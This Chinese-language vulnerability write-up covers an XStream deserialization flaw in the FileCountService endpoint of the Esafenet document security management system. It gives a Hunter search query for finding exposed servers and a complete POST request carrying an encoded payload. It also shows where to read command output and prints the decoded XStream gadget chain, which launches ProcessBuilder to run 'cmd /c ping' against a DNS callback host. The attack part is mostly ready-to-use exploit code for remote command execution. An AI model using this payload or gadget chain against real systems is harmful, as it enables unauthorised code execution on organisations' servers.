# 亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞

# 一、漏洞简介
  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞

# 二、影响版本
+ 亿赛通电子文档安全管理系统

# 三、资产测绘
+ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
+ 登录页面

![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/0FvUQBZBTUtW7DR2/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-696413.png)

# 四、漏洞复现
```plain
POST /CDGServer3/FileCountService HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 2657
Accept-Encoding: gzip

IENBCKMHHBGCCGPJPEFFFOAGCOOGHFFDBAMJLPIIMBFKPMJIJKHJCNIMHIOFPJCFAOJAADMKDCLKKCNINDOAOCDHIEMCNKFEJHAAGDCNPIPABKAKCBCMBAPIOJOINBGBKFNMIHCHPKIHMHKCCHFDNFHAEIGDJFNLBKPGCOGKKMMODNADCINGAHENHPLOHHCABLPKDFDLGBKGJKDINLMAJGEDKHNCOCDFONAMKKBHJGKOHBKIKNFCAEGAJKLJGEIGEOEAIGPHPEBLMNHPJCKEJDBMIEOKEEHHNFHKBIKFELMGLCBPHCAODNFBCGIOJFGECNLKNDFMDGBACCEIGEHHLOGPCIPLIMIGFKNEDFGFKKLKCEOHEJEENEKGFDMNIMHGLPOENCPNPHDHAIIKELIMIOOIDPGFCNGBPJNPEIDCDEPHBMPNFCHCJICOGDDENICOEEEBKFLOAEFKBFPJKNLEBCBLGPHLDAPDBKGNICLNNBLGLICDFAILMEJEDMIGFOGEIHFGJCNDGDKLHBDMFGGGGLMHDNBFECEIDPLGPNJMKHINBNJABNMNCHGAPHJOCBPNDDBJMADOIPFHDDECBIHMPDOIPCADCKOOBAMBPHOLCEOJNBFAOFGCOFKILCBPJGFLOLAAICBCAEFFKLOPGOBANGPHILDODOJNHNOMHKIDACOCGHODPDBBMBKFNEFPACOKBFNKNFNCFIPINBHKBMMGADELHLKDOHDMAMCAJKKPHFLNLIEEAJHIMMCBMGNFCDFGMGODECPJFJMDLOKOEKGJMMDHCBABGAPMHPNHGEFCKGMPIGBEJLLCCPBEAJFIALANKKAPKGNKNELJDNJMAKGOHNDCFKGOAPDDMDHNICGPEFONKBEFCOGPFFBEMMHEMIPBLEJFJAFJINIMMKGHBHAGDBMHHIINDNDNOHGOCAGIEAFEMHBOGEJNMKEHJIMANMICIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKECKBBDHFFNLAIHBBJIDBMCACIBMPELHBKJOBNMJHFGFDONBHIDABKIFFLFFONJAGDOEHEDLILAFKGHMFEPDJBMKCOBLFBBPKKFJDBAFLIDEEJIGCILEJCPHMPJDEAFLDCGFIBBIAIJELJELGGJOGKKGFJAPBPHDOPDGGNPLEDJOJNNNOLGCEMBLECPLOEDPOEAKFPALMOOEOJCJOOIDFDJMNAAMBMDOFKEHAGPGMCFOACPGHKDBDLHALONFAJLOGEIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEENNMJNJDLNKCCGIMKEDFNNGMAAENLKHONOPHFBIGELCBHLDIBFCOKJKEFFFEODJJMONDDDGIMIJAEPCLOAIKKJFGEOGEKHOHKABBOEFEHMGJPDFBPMCHPBIBOAMAGPOBICFGGJGFBGLJFONGBGHCNMDLHOPJHFDCMIAFFOKBKCGFEKGAGGGCKEOEOGCJANKKIBKJBMIHLGJIMELPHHCDFNNDAHKHMMHAPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHEPGGDNMIGEJICGKKCKNPOGPDCENCPIGEJOJEGHHHHLIGIEFIDHHBADCOMLOILLCMNAGIPHJNJNINNGBOIJEIIEBCKHNDBBIJIBHMPHMCFDGLAKAIJCDCMLIODBPCMCMHGDGODKBCJIGEHMLNFIPFDIHELCJKNFIFONFHIHIPKIFBCNDBPJLHONIMGOLOGDHAMKJNBIHCPOJHBGNBNJGHJFNNDHBNEMGHOKFLBFLKIIOBKGCCKJHMHMJPCHDHMHDNJPKPEPKKDEIBPCCDOBAFOKAIOHJGDKBNHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOFNPDDLNCEIDDNKBINIELBKPIBKPBDPGGGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDKMBPDOPNAICNNDNPCCMNOJCOFHNAPOLNCOJCEMKDDBBDCCJKFMJNEEEOKNMGDCKJHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOIECONEAJCCAGGKDAAOPCHLHGFGIICLPCPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHGOKEINIBDALBDPHDGABDBLOKCPCLJBGEBJABHBJKKMPKNBOACJOEDCGLHMLNJCIGPDENPGODCDFMLKCFJEMFDONJKPJFMJKLNGIIOLFNIEKPDLLFDDLFOBDAKJECFNCICGBOGOKMFAPKCNCBHECFFCAEBAKIJKEDGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDIBOKPKOPNMOGLJIPHKOBOABIDKNNAJMOCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDAEIAHAOKMBAPHMAMJEHADCHNLLMFBJBHBHHNLELIFCBNHACHNAFCIOAKOLJJBOGNIGMCEMOBKNNJCKAIBNFMALPKNACFCNIMDIFAKBFCCEMKLBOJNJJMGFPKFAMFINCIIDIGGANFCJLEEIFNHGEDLCGOADFFKBFMKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHEHJJPOHBKABNIPLFDBLOHBEPEJHKJGPPIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEABDPFDCBALFHCJFFCIFMMCGDJFOBBMIJDABFJEBOINJFJIEMNKLMANHBJACCEMAAEJIAHGENPCCOIPMINBLODFHOEFEMMMNLANHOFKKGLONPGFFCCLMHPIBKOEGEJEOFNGLHFFFCJPOBKBAEBOCJJHOHFCPDFNPDGKNOGJCFAHOBHBLMEMEFCBIJIPAPGODFOGFOFCHHAJKGFHFAFMAFJFCAMIAIGJAPFNPDLDFLDOBDHGJFPPANDAIBBGAHHBCIGGBILAMDIAEFNBJIDBEKEPFAHJKKCADDPCKCEPNNEJOLDKABIAPEBOIINFMDPDHEPFOMCIFMBKHPAHMIGKEIPPCDGJNIEAEIHOKGFAGPMFAONMIGECMBIMFFDEEEOBHGIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEAPPGKFOOOBKPEGIAJOPBAHGPPLGCKEGBJGJPFKGNECMPFABADCPAPIJOCJEMFCEEBHALEIHPAIAMOGIHJAJKJLJMADMOOCEGCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDHEHJFDDHJMNBBGOPGCELILLONJNFJKDKLMEJOGPIMPDIBBMPMALGJPHEEDDAHKLAHNGJBMHNLJLJCKIGOGLGPGEPABONGLEDGJIEMNOLFBFNJKJBAMKANBMAAGMNAJOIMPCIBBDEMMJEANGBHHEDELPBGIKDLAMHLPHOPNFNPLKFCLHADEDOJEBIMNIOGEEHKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHLKKOCMJJOGMFNIDPPDLHBNGNEMFEIMIEDFJPMFEIIFFHGFIEGMGBLFKKPGJKKOBMFIHCACNMDEHJLLOANAIHAHFGELFEOJMABALGMENKFNBNPMLDIKPJHBKGEAIBGDIMIAGDAIENNHBABAEGJGPFIFHAHOOPOCKBLNJPJACLFAAIMKFDMFILOFBMAPJPJMOHNNMANGFNJEMNFBJCCNGFLICOKDMHACNPEPGCHIJOKMKPDBJIKFOMPCNBILHGLJJJALBPNBBBLJLNALCKBJBMOHOPIPFKPAKOBALGMENKFNBNPMLDIKPJHBKGEAIBGDIMNNIKHPBFJAKOEEPBOAIIKOEICJOMCGADMMKJNGNAKEHMDDBMJGGLJLGHLAIOIFBLHLLLCIEMKHCBANEHPHAMPCPJACHMBGPHMMMBCKFHHGJBBBGFIHENAKJEHOOACLADMKFJIDGEHNANAACDIGJDINCAMEHOIIPJHAAIBIPMEEHLIOBHGMICGAALCEKFNFNBJNACEHDMDEGCPMNPAAFFHHJKMPMADKBBLGKKJMEJDKAHLEKIDFPKLLJENFDHJDMPKFGNGKEBJBEBPLKCHJMCBALICLGNGDCAMFNCNJGFIEODKPOBNJHGIIICPOGICEBIJFLCIHGOELNDCLIMKJBLGOAONEFFJKOLFLLIDOEJAECJPDPJHAGFNDAPGEGNPJODCPGFMAJHIINKLILMALMNEFHBGHMGGODBKFPKGPIAPMFEJOANAHEIGFJNOOMAOHKBIGLFEJMDICOLEAPNJIPDBMHLOCFBCBDKKAAHBEINNPFDAGOOKOAPFCPHDKNBNIAOFIBFBKLBFAKICAOJPOKPJNDEHGEHAMMEEKKIOAANIDMOAGKEIBNCKPMLPJGDMONAPMAGGPMDJIPBNDMPDGINGBCGEPDDDINPFJHEKKJIPPADMOKJPIEBAIBCJBGOJFEBLHNBLFABAMDPFDEANKPDEAENBLGIMIMLKBDFHEFHHJLPGGBENHGMLGLPJMPMPFEKGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLFEEIKMICBBDONOABFHNMGHPLKOEPPBDDGKBNCJGIFJECLHGBLHDIEJOIAILLEJNJGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLDAGMKNALPEGPCBCPBKEAAEKPLHIEKGLGPCAFBBPGHBMBDLMPHIOPCNNMFPJHKNINKHNJANGIHKHEDDGKGEFJIEPOCGFGLALANFMLAAJIFPIBIJBAFBHDDOJPPAHMFPGNMPGBJKFBCLEMAGKMJGMENMFPMDHKAFFKKNHNICEPICAPIBAJHFKDHHNLHBAGHJFEFEJELFBJFOECBNGODBBKBANCCABIPMGJABODCIMNPOAECKBECOGDJJDNKLJFGDNGFAAIGDEBMFIFMLBAGHJNNGJACPKEMENKDBIMOLFAEAGNFOFEFNHJMJFDEDCJAGGGPFOHNHIIDJLMFNGHLPEENAGKAEBAONIMGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLKCBFIGPBJLEODJIOPEALFLKCAJPFKMLONOBAMEHEOLAMHEOGLFJAOPGOCJPMOJCACFDBCMGCFNNLHIEPLOHLIICJAAKINIBHEHPLBFNMFEINBBMHMAJKNDFEPJFCPEOCGOHENHIAHNBBPAAICKCDAOJMMHMDDAANEAIPCCGLLNFIMFHJKKGFLMHILLMLEGFIPABOAMBDDEBCHEHPLHJHNDFCNBFABAPJANNLLHLNNNLLIAIHKHGDPAJOJOAPIPGNJNIHDKKFPNMKDCEKHAFJFKPFOKLFABGEBOFLFCGCCJ
```

![1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea.png](./img/0FvUQBZBTUtW7DR2/1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea-856627.png)

获取命令执行结果

```plain
/test.txt
```

![1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37.png](./img/0FvUQBZBTUtW7DR2/1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37-825432.png)

```plain
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command class="java.util.Arrays$ArrayList">
                        <a class="string-array">
                          <string>cmd</string>
                          <string>/c</string>
                          <string>ping</string>
                          <string>cnvd_test.zfdaqyzxch.dgrh3.cn</string>
                        </a>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
```



> 更新: 2024-04-20 22:01:34  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xyoufkqvrrixgyhy>